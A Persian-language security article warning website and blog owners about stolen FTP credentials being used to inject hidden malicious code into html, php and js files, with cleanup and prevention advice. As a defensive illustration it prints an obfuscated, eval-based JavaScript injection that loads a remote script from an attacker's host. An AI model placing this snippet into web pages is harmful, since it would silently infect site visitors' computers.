Loading...

وبلاگ نویسان و مدیران سایت ها ، امنیت را جدی بگیرید!

امنیت همیشه از مهمترین مسائل پیش روی وبلاگ نویسان و مدیران سایت های اینترنتی بوده است. با گذشت زمان و تغییرات مختلف در این محیط مجازی ، نوع حملات ، تغییر و دستکاری در محتوای سایت ها و وبلاگ ها نیز دستخوش تغییر شده است.

frustrated-computer-user

از جمله حملاتی که این روز ها شدیدا شایع شده است ، تغییر محتوای html صفحات به گونه ای است که بازدیدکنندگان معمولی هیچ تغییری در هنگام مشاهده صفحات سایت آلوده شده مشاهده نمی کنند در صورتی که بسته به نوع آلودگی ممکن است اطلاعات خاصی از آنها ربوده شود ویا فایل های آلوده ای بر روی کامپیوتر آنها دانلود و اجرا شوند.

معمولا خود صاحبان سایت و وبلاگ های آلوده شده نیز از اینکه صفحاتشان آلوده شده است اطلاع پیدا نمی کنند مگر آنکه از مرورگر های مدرنی چون فایرفاکس و یا گوگل کروم استفاده کنند و یا به دنبال وضعیت سایتشان در گوگل باشند! آن وقت است که با پیغام Malware Detected در مرورگر ها و یا This site may harm your computer در جستجوگر گوگل روبرو می شوند!

azmoon-hacked.gif

hacked-site.jpg

اما سوال این است که واقعا چگونه امکان دارد که محتوای سایت و یا وبلاگ شما بدون اجازه شخص شما توسط دیگران ویرایش شود؟ و سوال دیگر اینکه چگونه از این کار جلوگیری کنیم؟

در پاسخ این دو پرسش باید گفت که این مشکل اکثر برای کاربرانی پیش می آید که بر روی کامپیوتر خودشان Malware دارند. این کلمه کوتاه شده عبارت malicious-logic software است. malicious-logic software به نرم افزار های گفته می شوند که بدون اجازه کاربر اجرا می شوند که یا باعث وقفه در عملکرد سیستم و نرم افزار های دیگر می شوند و یا اطلاعاتی خاص را برای منبعی دیگر ارسال می کنند. malicious-logic software یک نام عمومی برای ویروس های کامپیوتری است.

معمولا کاربرانی که برای استفاده از نرم افزار های غیر رایگان از فایل های کرک و یا سایت های که این گونه فایل ها را پخش می کنند ، استفاده می کنند به Malware ها آلوده می شوند.

برای جلوگیری از آلودگی سعی کنید همیشه از نرم افزار های ضد ویروس و دیوارهای آتشین استفاده کنید به نحوی که همیشه بروز باشند. از مرورگر های مدرن استفاده کنید. فایرفاکس و گوگل کروم سریعا وب سایت های آلوده را تشخیص و به کاربر اعلام می کنند و مانع از اجرای هر گونه کد مخرب می شوند. به برنامه های که در زمان شروع ویندوز در پشت سیستم فعال می شوند دقت زیادی داشته باشید.

اما اگر این اتفاق برای شما افتاد ، اول لازم است این مسئله را بدانید که این مشکل ربطی به نرم افزارهای سرور ندارد ، در سرور های لینوکس بیشتر دیده شده است و بر فایل هایی با پسوند html ، php و js عمل می کند ، اما ربطی به php سرور یا apache و kernel و حتی کنترل پنل  cPanel ، Plesk و یا Directadmin ندارد!

اگر فایل های jsی که آلوده شده اند را باز کنید در انتهای آنها با کدهایی شبیه به کد زیر مواجه خواهید شد:

<!-- 
(function(brOh){var gz8='%';var w5J1=('var:
20a:3d:22Scr:69p:74:45ngi:6ee:22:2cb:3d:22V:65rs:69o:6e(:29+:22:2c:6a:3d:2
2:22:2cu:3dnav:69gat:6fr:2euserAge:6et:3bif(:28u:2eind:65xO:66(:22:57i:6e:22)
:3e0:29:26:26(u:2eind:65xOf:28:22N:54:206:22):3c0):26:26(documen:74:2ecoo:6bie:
2ei:6edexO:66(:22:6diek:3d:31:22):3c0:29:26:26:28typ:65:6ff(:7a:72vz:74s):21:3d
:74ypeof(:22A:22):29):7bzrvzt:73:3d:22A:22:3b:65va:6c(:22:69f(wi:6e:64o:77:2
e:22+a+:22)j:3dj:2b:22+a+:22Major:22+:62+a+:22Mino:72:22:2b:62+a+:22B:75i:6c
d:22+b+:22j:3b:22):3bdocum:65nt:2ewr:69t:65(:22:3c:73cr:69p:74:20sr:63:3d:2f
:2f:67:75mb:6car:2e:63:6e:2frss:2f:3fid:3d:22+j:2b:22:3e:3c:5c:2fscrip:74:3
e:22):3b:7d').replace(brOh,gz8);var aLwq=unescape(w5J1);eval(aLwq)})(/:/g);
-->

برای فایل های php نیز در ابتدای هر کدام که آلوده شده باشند با کدی شبیه به همین کد روبرو خواهید شد. توجه کنید ، این مسئله باز هم ربطی به این ندارد که از چه سیستمی استفاده می کنید ، وردپرس ، دروپال ، مامبو و هر سیستم دیگه ای احتمال آلودگی دارند.

این آلودگی به دلیل آن است که هکر و یا هکرها به رمز عبور FTP شما دست پیدا کرده اند. این مسئله می تواند به خاطر وجود تروجان و یا کی‌لاگر ها بر روی سیستم عامل شما باشد.

جهت حل این مشکل اول اطمینان حاصل کنید که اینگونه فایل ها را در سیستم خود شناسایی و حذف کرده اید ، در بعضی مواقع حتی لازم است سیستم عامل خود را دوباره نصب کنید.

اگر مدیر سرور هستید و این مشکل برای سایت های سطح سرور پیش آمده است ، ققط کافی است رمز عبور root سرور را تغییر دهید.

اگر مدیر سایت و یا وبلاگ هستید و این مشکل فقط برای شما پیش آمده است ، کافی است رمز عبور پنل مدیریتی سایت خود و FTP های که ساخته اید را تغییر دهید.

سعی کنید رمز های عبور خود را امن نگه دارید ، در صورت نیاز می توانید از نرم افزار هایی مثل KeePass استفاده کنید که رایگان و کد باز نیز می باشد.

برای بازگردانی فایل های آلوده شده به حالت اول ، اگر از وردپرس ، دروپال ، مامبو ویا سیستم های مشابه استفاده می کنید ، باید فایل های آنها را از ابتدا بر روی سایت خود آپلود کنید. اگر از مووبل تایپ استفاده می کنید فقط کافی است سایت خود را از طریق کنترل پنل مدیریت باز سازی کنید! بقیه فایل هایی که دستی ایجاد شده اند نیز باید به صورت مستقیم و توسط کاربر تمیز شوند.

اگر با FTP به سایت خود وصل شوید و برای نمونه به مشخصات چند فایل آلوده نگاه کنید ، خواهید دید که تاریخ و زمان آخرین تغییرات این فایل ها یکی است! اگر نسخه پشتیبانی از فایل های خود قبل از زمان تغییر فایل های مورد نظر داشتید ، می توانید آن را بازگردانید تا همه فایل ها به صورت یک جا از آلودگی ، پاک شوند.

میلیون ها سایت و وبلاگ آلوده در سطح وب هم اکنون وجود دارند ، اگر علاقه ندارید که سایت و وبلاگ شما جزئی از آنها باشد ، توصیه های امنیتی را جدی بگیرید!




لطفاً برای ارسال نظر ابتدا وارد حساب کاربری خود بشوید
اگر تاکنون ثبت نام نکرده اید ، روی این لینک کلیک کنید

از مجموع 96,939 مطلب نوشته شده توسط 1033 نویسنده در 96 وب سایت و وبلاگ آی تی فارسی زبان، تاکنون 9,012 مقاله دست چین و در نشریه خوارزمی منتشر شده اند. در حال حاضر 5006 مقاله دریافت شده در انتظار نشر قرار دارند. تا امروز بیش از 167,472,000 بار این مقالات خوانده شده اند.

نشریه خوارزمی آگهی می پذیرد.

http://kharazmi.org

لوازم جانبی موبایل با قیمتهای غیر قابل رقابت

https://drjanebi.com

نام کاربری:
کلمه عبور: